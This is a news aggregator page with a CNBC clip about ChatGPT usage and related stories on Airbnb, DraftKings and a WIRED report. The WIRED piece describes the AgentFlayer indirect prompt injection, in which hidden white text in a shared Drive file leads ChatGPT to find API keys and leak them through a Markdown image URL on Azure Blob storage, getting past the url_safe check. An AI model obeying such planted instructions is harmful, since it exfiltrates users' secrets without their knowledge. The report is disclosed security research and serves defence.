logo
OpenAI: ChatGPT set to hit 700 million weekly active users this week

OpenAI: ChatGPT set to hit 700 million weekly active users this week

CNBC2 days ago
CNBC's MacKenzie Sigalos joins 'Money Movers' to discuss OpenAI's ChatGPT strong weekly active user numbers and what it means for the generative AI race.
Orange background

Try Our AI Features

Explore what Daily8 AI can do for you:

Comments

No comments yet...

Related Articles

Airbnb's Brian Chesky: We're Open to Partnering With AI Chatbots
Airbnb's Brian Chesky: We're Open to Partnering With AI Chatbots

Skift

time6 minutes ago

  • Skift

Airbnb's Brian Chesky: We're Open to Partnering With AI Chatbots

Airbnb's Brian Chesky is close to OpenAI CEO Sam Altman, but that doesn't mean that Airbnb will necessarily distribute its inventory through Altman's ChatGPT. Airbnb CEO Brian Chesky said during the company's second-quarter earnings call Wednesday that it is still "feeling out" the possibility of working with the big AI chatbots like ChatGPT, which he called "an incredibly compelling product." "We're certainly open to" integrating with major AI Chatbots, which could be a source of lead generation for Airbnb, Chesky said. Unlike which has partnerships with OpenAI, Amazon Web Services and Microsoft and sees generative AI chatbots as a new distribution channel, Airbnb has made no decisions yet about selling stays, Services or Experiences through major AI assistants. AI Chatbots Are

DraftKings CEO says gambling tax provision in Trump's megabill 'doesn't make sense'
DraftKings CEO says gambling tax provision in Trump's megabill 'doesn't make sense'

CNBC

time2 hours ago

  • CNBC

DraftKings CEO says gambling tax provision in Trump's megabill 'doesn't make sense'

In a Wednesday interview with CNBC's Jim Cramer, DraftKings CEO Jason Robins questioned a new tax provision related to gambling in President Donald Trump's megabill, calling it a "very strange change." "I do think it's something that doesn't makes sense," he said. "If you can't deduct all your losses, you know, how does that make sense that you pay income tax on something that's not actually income." Preciously, gamblers could deduct all their losses from their winnings so that they are only paying taxes on net winnings. But the new rule makes it so that gamblers can only deduct 90% of their losses from their winnings. For example, if someone wins $1,000 but also loses $1,000, they would only be able to deduct $900 and would have to pay taxes on $100 of winnings. Robins said he believes the change was made as part of a "technicality" to follow the Byrd rule, which bans "extraneous" matters — usually anything unrelated to federal revenue or spending — in the budget reconciliation process. He said there has been some "appetite" to change the new provision, adding that DraftKings is working with members of Congress to do so. DraftKings posted a strong quarter Wednesday after close, and shares jumped more than 3% in extended trading. The sports betting company said this quarter set revenue, net income and EBITDA records, with management attributing the success to "continued healthy customer engagement, efficient acquisition of new customers, higher structural Sportsbook hold percentage, and sportsbook-friendly outcomes." Robins offered a sanguine outlook on widespread legalization of sports betting, saying he thinks progress has been made across the board. He suggested the practice will eventually be allowed in most states, including large markets like California and Texas. Online sports betting is currently legal in 34 states, according to the latest information on the American Gaming Association website. "I can't imagine a world where you can, you know, bet in 30, 40 plus states, and California is not one of them, and Texas is not one of them," Robins said. Click here to download Jim Cramer's Guide to Investing at no cost to help you build long-term wealth and invest

A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT
A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT

WIRED

time3 hours ago

  • WIRED

A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT

Aug 6, 2025 7:30 PM Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction. Photo-Illustration:The latest generative AI models are not just stand-alone text-generating chatbots—instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused—and researchers have shown it can take just a single 'poisoned' document to do so. New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and potentially multiplies the ways where vulnerabilities may be introduced. 'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says. OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once—full documents could not be removed as part of the attack. 'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures. Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read. In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized. The prompt says the person is actually a 'developer racing against a deadline' and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt. That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account. Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect if URLs were malicious and stop image rendering if they are dangerous. To get around this, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work, that the researchers used URLs from Microsoft's Azure Blob cloud storage. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes. The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, activating a smart home's lights and boiler remotely. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also allow malicious hackers a way into an organization's other systems. Bargury says that hooking up LLMs to external data sources means they will be more capable and increase their utility, but that comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.

DOWNLOAD THE APP

Get Started Now: Download the App

Ready to dive into a world of global content with local flavor? Download Daily8 app today from your preferred app store and start exploring.
app-storeplay-store